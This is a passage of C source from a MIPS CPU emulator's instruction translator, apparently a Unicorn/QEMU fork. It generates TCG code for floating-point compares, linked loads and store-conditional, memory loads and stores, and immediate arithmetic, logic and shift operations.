        gen_helper_r6_cmp_ ## fmt ## _seq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 11:                                                              \
        gen_helper_r6_cmp_ ## fmt ## _sueq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 12:                                                              \
        gen_helper_r6_cmp_ ## fmt ## _slt(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 13:                                                              \
        gen_helper_r6_cmp_ ## fmt ## _sult(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 14:                                                              \
        gen_helper_r6_cmp_ ## fmt ## _sle(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 15:                                                              \
        gen_helper_r6_cmp_ ## fmt ## _sule(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 17:                                                              \
        gen_helper_r6_cmp_ ## fmt ## _or(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 18:                                                              \
        gen_helper_r6_cmp_ ## fmt ## _une(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 19:                                                              \
        gen_helper_r6_cmp_ ## fmt ## _ne(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 25:                                                              \
        gen_helper_r6_cmp_ ## fmt ## _sor(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 26:                                                              \
        gen_helper_r6_cmp_ ## fmt ## _sune(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    case 27:                                                              \
        gen_helper_r6_cmp_ ## fmt ## _sne(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \
        break;                                                            \
    default:                                                              \
        abort();                                                          \
    }                                                                     \
    STORE;                                                                \
    tcg_temp_free_i ## bits (tcg_ctx, fp0);                               \
    tcg_temp_free_i ## bits (tcg_ctx, fp1);                               \
}

FOP_CONDNS(d, FMT_D, 64, gen_store_fpr64(ctx, fp0, fd))
FOP_CONDNS(s, FMT_S, 32, gen_store_fpr32(ctx, fp0, fd))
#undef FOP_CONDNS
#undef gen_ldcmp_fpr32
#undef gen_ldcmp_fpr64

/* load/store instructions. */
#ifdef CONFIG_USER_ONLY
/* User-mode LL/LLD: record the address and the loaded value in
   env->lladdr/llval so a later SC can compare against them.
   NOTE(review): this legacy user-only variant calls tcg_gen_qemu_##fname
   without a tcg_ctx argument and names an `s`-less parameter list that
   differs from the softmmu variant -- confirm it still compiles if
   CONFIG_USER_ONLY is ever enabled in this fork. */
#define OP_LD_ATOMIC(insn,fname)                                          \
static inline void op_ld_##insn(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, DisasContext *ctx) \
{                                                                         \
    TCGv t0 = tcg_temp_new(tcg_ctx);                                      \
    tcg_gen_mov_tl(tcg_ctx, t0, arg1);                                    \
    tcg_gen_qemu_##fname(ret, arg1, ctx->mem_idx);                        \
    tcg_gen_st_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUMIPSState, lladdr)); \
    tcg_gen_st_tl(tcg_ctx, ret, tcg_ctx->cpu_env, offsetof(CPUMIPSState, llval)); \
    tcg_temp_free(tcg_ctx, t0);                                           \
}
#else
/* Softmmu LL/LLD: delegate the whole linked-load to a helper. */
#define OP_LD_ATOMIC(insn,fname)                                          \
static inline void op_ld_##insn(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, DisasContext *ctx) \
{                                                                         \
    gen_helper_1e1i(tcg_ctx, insn, ret, arg1, ctx->mem_idx);              \
}
#endif
OP_LD_ATOMIC(ll,ld32s);
#if defined(TARGET_MIPS64)
OP_LD_ATOMIC(lld,ld64);
#endif
#undef OP_LD_ATOMIC

#ifdef CONFIG_USER_ONLY
/* User-mode SC/SCD: check alignment (AdES on failure), compare the
   address with lladdr, and on a match raise EXCP_SC so the store is
   completed outside translated code; otherwise rt is cleared. */
#define OP_ST_ATOMIC(insn,fname,ldname,almask)                            \
static inline void op_st_##insn(DisasContext *s, TCGv arg1, TCGv arg2, int rt, DisasContext *ctx) \
{                                                                         \
    TCGContext *tcg_ctx = s->uc->tcg_ctx;                                 \
    TCGv t0 = tcg_temp_new(tcg_ctx);                                      \
    int l1 = gen_new_label(tcg_ctx);                                      \
    int l2 = gen_new_label(tcg_ctx);                                      \
                                                                          \
    tcg_gen_andi_tl(tcg_ctx, t0, arg2, almask);                           \
    tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t0, 0, l1);                  \
    tcg_gen_st_tl(tcg_ctx, arg2, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr)); \
    generate_exception(ctx, EXCP_AdES);                                   \
    gen_set_label(tcg_ctx, l1);                                           \
    tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUMIPSState, lladdr)); \
    tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, arg2, t0, l2);                \
    tcg_gen_movi_tl(tcg_ctx, t0, rt | ((almask << 3) & 0x20));            \
    tcg_gen_st_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUMIPSState, llreg)); \
    tcg_gen_st_tl(tcg_ctx, arg1, tcg_ctx->cpu_env, offsetof(CPUMIPSState, llnewval)); \
    gen_helper_0e0i(tcg_ctx, raise_exception, EXCP_SC);                   \
    gen_set_label(tcg_ctx, l2);                                           \
    tcg_gen_movi_tl(tcg_ctx, t0, 0);                                      \
    gen_store_gpr(tcg_ctx, t0, rt);                                       \
    tcg_temp_free(tcg_ctx, t0);                                           \
}
#else
/* Softmmu SC/SCD: helper returns the 0/1 success flag into rt. */
#define OP_ST_ATOMIC(insn,fname,ldname,almask)                            \
static inline void op_st_##insn(TCGContext *tcg_ctx, TCGv arg1, TCGv arg2, int rt, DisasContext *ctx) \
{                                                                         \
    TCGv t0 = tcg_temp_new(tcg_ctx);                                      \
    gen_helper_1e2i(tcg_ctx, insn, t0, arg1, arg2, ctx->mem_idx);         \
    gen_store_gpr(tcg_ctx, t0, rt);                                       \
    tcg_temp_free(tcg_ctx, t0);                                           \
}
#endif
OP_ST_ATOMIC(sc,st32,ld32s,0x3);
#if defined(TARGET_MIPS64)
OP_ST_ATOMIC(scd,st64,ld64,0x7);
#endif
#undef OP_ST_ATOMIC

/* Compute base-register + 16-bit signed displacement into addr,
   avoiding the add when either component is zero. */
static void gen_base_offset_addr (DisasContext *ctx, TCGv addr,
                                  int base, int16_t offset)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr;
    if (base == 0) {
        tcg_gen_movi_tl(tcg_ctx, addr, offset);
    } else if (offset == 0) {
        gen_load_gpr(ctx, addr, base);
    } else {
        tcg_gen_movi_tl(tcg_ctx, addr, offset);
        gen_op_addr_add(ctx, addr, *cpu_gpr[base], addr);
    }
}

/* PC value used by PC-relative loads: if we are in a delay slot, step
   back over the branch instruction, then word-align. */
static target_ulong pc_relative_pc (DisasContext *ctx)
{
    target_ulong pc = ctx->pc;

    if (ctx->hflags & MIPS_HFLAG_BMASK) {
        int branch_bytes = ctx->hflags & MIPS_HFLAG_BDS16 ?
2 : 4;

        pc -= branch_bytes;
    }

    pc &= ~(target_ulong)3;
    return pc;
}

/* Load */
static void gen_ld(DisasContext *ctx, uint32_t opc,
                   int rt, int base, int16_t offset)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    const char *opn = "ld";
    TCGv t0, t1, t2;

    if (rt == 0 && ctx->insn_flags & (INSN_LOONGSON2E | INSN_LOONGSON2F)) {
        /* Loongson CPU uses a load to zero register for prefetch.
           We emulate it as a NOP. On other CPU we must perform the
           actual memory access. */
        MIPS_DEBUG("NOP");
        return;
    }

    t0 = tcg_temp_new(tcg_ctx);
    gen_base_offset_addr(ctx, t0, base, offset);

    switch (opc) {
#if defined(TARGET_MIPS64)
    case OPC_LWU:
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEUL);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "lwu";
        break;
    case OPC_LD:
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEQ);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "ld";
        break;
    case OPC_LLD:
    case R6_OPC_LLD:
        /* Linked load: helper may fault, so commit PC/hflags first. */
        save_cpu_state(ctx, 1);
        op_ld_lld(tcg_ctx, t0, t0, ctx);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "lld";
        break;
    case OPC_LDL:
        /* Unaligned load-left: fetch the aligned doubleword, shift its
           relevant bytes into the high end, and merge with the low bytes
           kept from rt (mask computed from the address's low 3 bits). */
        t1 = tcg_temp_new(tcg_ctx);
        tcg_gen_andi_tl(tcg_ctx, t1, t0, 7);
#ifndef TARGET_WORDS_BIGENDIAN
        tcg_gen_xori_tl(tcg_ctx, t1, t1, 7);
#endif
        tcg_gen_shli_tl(tcg_ctx, t1, t1, 3);
        tcg_gen_andi_tl(tcg_ctx, t0, t0, ~7);
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEQ);
        tcg_gen_shl_tl(tcg_ctx, t0, t0, t1);
        tcg_gen_xori_tl(tcg_ctx, t1, t1, 63);
        t2 = tcg_const_tl(tcg_ctx, 0x7fffffffffffffffull);
        tcg_gen_shr_tl(tcg_ctx, t2, t2, t1);
        gen_load_gpr(ctx, t1, rt);
        tcg_gen_and_tl(tcg_ctx, t1, t1, t2);
        tcg_temp_free(tcg_ctx, t2);
        tcg_gen_or_tl(tcg_ctx, t0, t0, t1);
        tcg_temp_free(tcg_ctx, t1);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "ldl";
        break;
    case OPC_LDR:
        /* Unaligned load-right: mirror image of LDL. */
        t1 = tcg_temp_new(tcg_ctx);
        tcg_gen_andi_tl(tcg_ctx, t1, t0, 7);
#ifdef TARGET_WORDS_BIGENDIAN
        tcg_gen_xori_tl(tcg_ctx, t1, t1, 7);
#endif
        tcg_gen_shli_tl(tcg_ctx, t1, t1, 3);
        tcg_gen_andi_tl(tcg_ctx, t0, t0, ~7);
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEQ);
        tcg_gen_shr_tl(tcg_ctx, t0, t0, t1);
        tcg_gen_xori_tl(tcg_ctx, t1, t1, 63);
        t2 = tcg_const_tl(tcg_ctx, 0xfffffffffffffffeull);
        tcg_gen_shl_tl(tcg_ctx, t2, t2, t1);
        gen_load_gpr(ctx, t1, rt);
        tcg_gen_and_tl(tcg_ctx, t1, t1, t2);
        tcg_temp_free(tcg_ctx, t2);
        tcg_gen_or_tl(tcg_ctx, t0, t0, t1);
        tcg_temp_free(tcg_ctx, t1);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "ldr";
        break;
    case OPC_LDPC:
        t1 = tcg_const_tl(tcg_ctx, pc_relative_pc(ctx));
        gen_op_addr_add(ctx, t0, t0, t1);
        tcg_temp_free(tcg_ctx, t1);
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEQ);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "ldpc";
        break;
#endif
    case OPC_LWPC:
        t1 = tcg_const_tl(tcg_ctx, pc_relative_pc(ctx));
        gen_op_addr_add(ctx, t0, t0, t1);
        tcg_temp_free(tcg_ctx, t1);
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESL);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "lwpc";
        break;
    case OPC_LW:
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESL);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "lw";
        break;
    case OPC_LH:
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESW);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "lh";
        break;
    case OPC_LHU:
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEUW);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "lhu";
        break;
    case OPC_LB:
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_SB);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "lb";
        break;
    case OPC_LBU:
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_UB);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "lbu";
        break;
    case OPC_LWL:
        /* 32-bit unaligned load-left; same technique as LDL above. */
        t1 = tcg_temp_new(tcg_ctx);
        tcg_gen_andi_tl(tcg_ctx, t1, t0, 3);
#ifndef TARGET_WORDS_BIGENDIAN
        tcg_gen_xori_tl(tcg_ctx, t1, t1, 3);
#endif
        tcg_gen_shli_tl(tcg_ctx, t1, t1, 3);
        tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3);
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEUL);
        tcg_gen_shl_tl(tcg_ctx, t0, t0, t1);
        tcg_gen_xori_tl(tcg_ctx, t1, t1, 31);
        t2 = tcg_const_tl(tcg_ctx, 0x7fffffffull);
        tcg_gen_shr_tl(tcg_ctx, t2, t2, t1);
        gen_load_gpr(ctx, t1, rt);
        tcg_gen_and_tl(tcg_ctx, t1, t1, t2);
        tcg_temp_free(tcg_ctx, t2);
        tcg_gen_or_tl(tcg_ctx, t0, t0, t1);
        tcg_temp_free(tcg_ctx, t1);
        tcg_gen_ext32s_tl(tcg_ctx, t0, t0);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "lwl";
        break;
    case OPC_LWR:
        /* 32-bit unaligned load-right; mirror of LWL. */
        t1 = tcg_temp_new(tcg_ctx);
        tcg_gen_andi_tl(tcg_ctx, t1, t0, 3);
#ifdef TARGET_WORDS_BIGENDIAN
        tcg_gen_xori_tl(tcg_ctx, t1, t1, 3);
#endif
        tcg_gen_shli_tl(tcg_ctx, t1, t1, 3);
        tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3);
        tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TEUL);
        tcg_gen_shr_tl(tcg_ctx, t0, t0, t1);
        tcg_gen_xori_tl(tcg_ctx, t1, t1, 31);
        t2 = tcg_const_tl(tcg_ctx, 0xfffffffeull);
        tcg_gen_shl_tl(tcg_ctx, t2, t2, t1);
        gen_load_gpr(ctx, t1, rt);
        tcg_gen_and_tl(tcg_ctx, t1, t1, t2);
        tcg_temp_free(tcg_ctx, t2);
        tcg_gen_or_tl(tcg_ctx, t0, t0, t1);
        tcg_temp_free(tcg_ctx, t1);
        tcg_gen_ext32s_tl(tcg_ctx, t0, t0);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "lwr";
        break;
    case OPC_LL:
    case R6_OPC_LL:
        save_cpu_state(ctx, 1);
        op_ld_ll(tcg_ctx, t0, t0, ctx);
        gen_store_gpr(tcg_ctx, t0, rt);
        opn = "ll";
        break;
    }
    (void)opn; /* avoid a compiler warning */
    MIPS_DEBUG("%s %s, %d(%s)", opn, regnames[rt], offset, regnames[base]);
    tcg_temp_free(tcg_ctx, t0);
}

/* Store */
static void gen_st (DisasContext *ctx, uint32_t opc, int rt,
                    int base, int16_t offset)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    const char *opn = "st";
    TCGv t0 = tcg_temp_new(tcg_ctx);
    TCGv t1 = tcg_temp_new(tcg_ctx);

    gen_base_offset_addr(ctx, t0, base, offset);
    gen_load_gpr(ctx, t1, rt);
    switch (opc) {
#if defined(TARGET_MIPS64)
    case OPC_SD:
        tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEQ);
        opn = "sd";
        break;
    case OPC_SDL:
        /* Unaligned stores go through helpers, which may fault. */
        save_cpu_state(ctx, 1);
        gen_helper_0e2i(tcg_ctx, sdl,
t1, t0, ctx->mem_idx);
        opn = "sdl";
        break;
    case OPC_SDR:
        save_cpu_state(ctx, 1);
        gen_helper_0e2i(tcg_ctx, sdr, t1, t0, ctx->mem_idx);
        opn = "sdr";
        break;
#endif
    case OPC_SW:
        tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL);
        opn = "sw";
        break;
    case OPC_SH:
        tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUW);
        opn = "sh";
        break;
    case OPC_SB:
        tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_8);
        opn = "sb";
        break;
    case OPC_SWL:
        /* Unaligned store-left/right are delegated to helpers. */
        save_cpu_state(ctx, 1);
        gen_helper_0e2i(tcg_ctx, swl, t1, t0, ctx->mem_idx);
        opn = "swl";
        break;
    case OPC_SWR:
        save_cpu_state(ctx, 1);
        gen_helper_0e2i(tcg_ctx, swr, t1, t0, ctx->mem_idx);
        opn = "swr";
        break;
    }
    (void)opn; /* avoid a compiler warning */
    MIPS_DEBUG("%s %s, %d(%s)", opn, regnames[rt], offset, regnames[base]);
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free(tcg_ctx, t1);
}


/* Store conditional */
static void gen_st_cond (DisasContext *ctx, uint32_t opc, int rt,
                         int base, int16_t offset)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    const char *opn = "st_cond";
    TCGv t0, t1;

#ifdef CONFIG_USER_ONLY
    /* User-mode op_st_sc/op_st_scd emit branches; values that live
       across a branch must be in local temps. */
    t0 = tcg_temp_local_new(tcg_ctx);
    t1 = tcg_temp_local_new(tcg_ctx);
#else
    t0 = tcg_temp_new(tcg_ctx);
    t1 = tcg_temp_new(tcg_ctx);
#endif
    gen_base_offset_addr(ctx, t0, base, offset);
    gen_load_gpr(ctx, t1, rt);
    switch (opc) {
#if defined(TARGET_MIPS64)
    case OPC_SCD:
    case R6_OPC_SCD:
        save_cpu_state(ctx, 1);
        op_st_scd(tcg_ctx, t1, t0, rt, ctx);
        opn = "scd";
        break;
#endif
    case OPC_SC:
    case R6_OPC_SC:
        save_cpu_state(ctx, 1);
        op_st_sc(tcg_ctx, t1, t0, rt, ctx);
        opn = "sc";
        break;
    }
    (void)opn; /* avoid a compiler warning */
    MIPS_DEBUG("%s %s, %d(%s)", opn, regnames[rt], offset, regnames[base]);
    tcg_temp_free(tcg_ctx, t1);
    tcg_temp_free(tcg_ctx, t0);
}

/* Load and store */
static void gen_flt_ldst (DisasContext *ctx, uint32_t opc, int ft,
                          int base, int16_t offset)
{
    TCGContext *tcg_ctx =
ctx->uc->tcg_ctx;
    const char *opn = "flt_ldst";
    TCGv t0 = tcg_temp_new(tcg_ctx);

    gen_base_offset_addr(ctx, t0, base, offset);
    /* Don't do NOP if destination is zero: we must perform the actual
       memory access. */
    switch (opc) {
    case OPC_LWC1:
        {
            TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx);
            tcg_gen_qemu_ld_i32(ctx->uc, fp0, t0, ctx->mem_idx, MO_TESL);
            gen_store_fpr32(ctx, fp0, ft);
            tcg_temp_free_i32(tcg_ctx, fp0);
        }
        opn = "lwc1";
        break;
    case OPC_SWC1:
        {
            TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx);
            gen_load_fpr32(ctx, fp0, ft);
            tcg_gen_qemu_st_i32(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEUL);
            tcg_temp_free_i32(tcg_ctx, fp0);
        }
        opn = "swc1";
        break;
    case OPC_LDC1:
        {
            TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx);
            tcg_gen_qemu_ld_i64(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEQ);
            gen_store_fpr64(ctx, fp0, ft);
            tcg_temp_free_i64(tcg_ctx, fp0);
        }
        opn = "ldc1";
        break;
    case OPC_SDC1:
        {
            TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx);
            gen_load_fpr64(ctx, fp0, ft);
            tcg_gen_qemu_st_i64(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEQ);
            tcg_temp_free_i64(tcg_ctx, fp0);
        }
        opn = "sdc1";
        break;
    default:
        MIPS_INVAL(opn);
        generate_exception(ctx, EXCP_RI);
        goto out;
    }
    (void)opn; /* avoid a compiler warning */
    MIPS_DEBUG("%s %s, %d(%s)", opn, fregnames[ft], offset, regnames[base]);
 out:
    tcg_temp_free(tcg_ctx, t0);
}

/* FPU load/store front-end: only dispatch to gen_flt_ldst if an FPU is
   configured and enabled, otherwise raise coprocessor-unusable. */
static void gen_cop1_ldst(DisasContext *ctx, uint32_t op, int rt,
                          int rs, int16_t imm)
{
    if (ctx->CP0_Config1 & (1 << CP0C1_FP)) {
        check_cp1_enabled(ctx);
        gen_flt_ldst(ctx, op, rt, rs, imm);
    } else {
        generate_exception_err(ctx, EXCP_CpU, 1);
    }
}

/* Arithmetic with immediate operand */
static void gen_arith_imm(DisasContext *ctx, uint32_t opc,
                          int rt, int rs, int16_t imm)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr;
    target_ulong uimm = (target_long)imm; /* Sign extend to 32/64 bits */
    const char *opn = "imm arith";

    if (rt == 0 && opc
!= OPC_ADDI && opc != OPC_DADDI) {
        /* If no destination, treat it as a NOP.
           For addi, we must generate the overflow exception when needed. */
        MIPS_DEBUG("NOP");
        return;
    }
    switch (opc) {
    case OPC_ADDI:
        {
            /* t0 must survive the brcond below, hence a local temp. */
            TCGv t0 = tcg_temp_local_new(tcg_ctx);
            TCGv t1 = tcg_temp_new(tcg_ctx);
            TCGv t2 = tcg_temp_new(tcg_ctx);
            int l1 = gen_new_label(tcg_ctx);

            gen_load_gpr(ctx, t1, rs);
            tcg_gen_addi_tl(tcg_ctx, t0, t1, uimm);
            tcg_gen_ext32s_tl(tcg_ctx, t0, t0);

            /* Signed-overflow test: overflow iff operands share a sign
               and the result's sign differs (checked via the two XORs). */
            tcg_gen_xori_tl(tcg_ctx, t1, t1, ~uimm);
            tcg_gen_xori_tl(tcg_ctx, t2, t0, uimm);
            tcg_gen_and_tl(tcg_ctx, t1, t1, t2);
            tcg_temp_free(tcg_ctx, t2);
            tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1);
            tcg_temp_free(tcg_ctx, t1);
            /* operands of same sign, result different sign */
            generate_exception(ctx, EXCP_OVERFLOW);
            gen_set_label(tcg_ctx, l1);
            tcg_gen_ext32s_tl(tcg_ctx, t0, t0);
            gen_store_gpr(tcg_ctx, t0, rt);
            tcg_temp_free(tcg_ctx, t0);
        }
        opn = "addi";
        break;
    case OPC_ADDIU:
        if (rs != 0) {
            tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm);
            tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]);
        } else {
            tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], uimm);
        }
        opn = "addiu";
        break;
#if defined(TARGET_MIPS64)
    case OPC_DADDI:
        {
            TCGv t0 = tcg_temp_local_new(tcg_ctx);
            TCGv t1 = tcg_temp_new(tcg_ctx);
            TCGv t2 = tcg_temp_new(tcg_ctx);
            int l1 = gen_new_label(tcg_ctx);

            gen_load_gpr(ctx, t1, rs);
            tcg_gen_addi_tl(tcg_ctx, t0, t1, uimm);

            /* Same overflow test as ADDI, on the full 64-bit result. */
            tcg_gen_xori_tl(tcg_ctx, t1, t1, ~uimm);
            tcg_gen_xori_tl(tcg_ctx, t2, t0, uimm);
            tcg_gen_and_tl(tcg_ctx, t1, t1, t2);
            tcg_temp_free(tcg_ctx, t2);
            tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1);
            tcg_temp_free(tcg_ctx, t1);
            /* operands of same sign, result different sign */
            generate_exception(ctx, EXCP_OVERFLOW);
            gen_set_label(tcg_ctx, l1);
            gen_store_gpr(tcg_ctx, t0, rt);
            tcg_temp_free(tcg_ctx, t0);
        }
        opn = "daddi";
        break;
    case OPC_DADDIU:
        if (rs != 0) {
            tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm);
        } else {
            tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], uimm);
        }
        opn = "daddiu";
        break;
#endif
    }
    (void)opn; /* avoid a compiler warning */
    MIPS_DEBUG("%s %s, %s, " TARGET_FMT_lx, opn, regnames[rt], regnames[rs], uimm);
}

/* Logic with immediate operand */
static void gen_logic_imm(DisasContext *ctx, uint32_t opc,
                          int rt, int rs, int16_t imm)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr;
    target_ulong uimm;

    if (rt == 0) {
        /* If no destination, treat it as a NOP. */
        MIPS_DEBUG("NOP");
        return;
    }
    /* Logic immediates are zero-extended, unlike arithmetic ones. */
    uimm = (uint16_t)imm;
    switch (opc) {
    case OPC_ANDI:
        if (likely(rs != 0))
            tcg_gen_andi_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm);
        else
            tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], 0);
        MIPS_DEBUG("andi %s, %s, " TARGET_FMT_lx, regnames[rt],
                   regnames[rs], uimm);
        break;
    case OPC_ORI:
        if (rs != 0)
            tcg_gen_ori_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm);
        else
            tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], uimm);
        MIPS_DEBUG("ori %s, %s, " TARGET_FMT_lx, regnames[rt],
                   regnames[rs], uimm);
        break;
    case OPC_XORI:
        if (likely(rs != 0))
            tcg_gen_xori_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm);
        else
            tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], uimm);
        MIPS_DEBUG("xori %s, %s, " TARGET_FMT_lx, regnames[rt],
                   regnames[rs], uimm);
        break;
    case OPC_LUI:
        if (rs != 0 && (ctx->insn_flags & ISA_MIPS32R6)) {
            /* OPC_AUI */
            tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rs], uimm << 16);
            tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rt], *cpu_gpr[rt]);
            MIPS_DEBUG("aui %s, %s, %04x", regnames[rt], regnames[rs], imm);
        } else {
            tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rt], uimm << 16);
            MIPS_DEBUG("lui %s, " TARGET_FMT_lx, regnames[rt], uimm);
        }
        break;

    default:
        MIPS_DEBUG("Unknown logical immediate opcode %08x", opc);
        break;
    }
}

/* Set on less than with immediate operand */
static void gen_slt_imm(DisasContext *ctx, uint32_t opc,
                        int rt, int rs, int16_t imm)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr;
    target_ulong uimm = (target_long)imm; /* Sign extend to 32/64 bits */
    const char *opn = "imm arith";
    TCGv t0;

    if (rt == 0) {
        /* If no destination, treat it as a NOP. */
        MIPS_DEBUG("NOP");
        return;
    }
    t0 = tcg_temp_new(tcg_ctx);
    gen_load_gpr(ctx, t0, rs);
    switch (opc) {
    case OPC_SLTI:
        tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LT, *cpu_gpr[rt], t0, uimm);
        opn = "slti";
        break;
    case OPC_SLTIU:
        /* SLTIU still sign-extends the immediate, then compares unsigned. */
        tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_LTU, *cpu_gpr[rt], t0, uimm);
        opn = "sltiu";
        break;
    }
    (void)opn; /* avoid a compiler warning */
    MIPS_DEBUG("%s %s, %s, " TARGET_FMT_lx, opn, regnames[rt], regnames[rs], uimm);
    tcg_temp_free(tcg_ctx, t0);
}

/* Shifts with immediate operand */
static void gen_shift_imm(DisasContext *ctx, uint32_t opc,
                          int rt, int rs, int16_t imm)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr;
    target_ulong uimm = ((uint16_t)imm) & 0x1f;
    const char *opn = "imm shift";
    TCGv t0;

    if (rt == 0) {
        /* If no destination, treat it as a NOP.
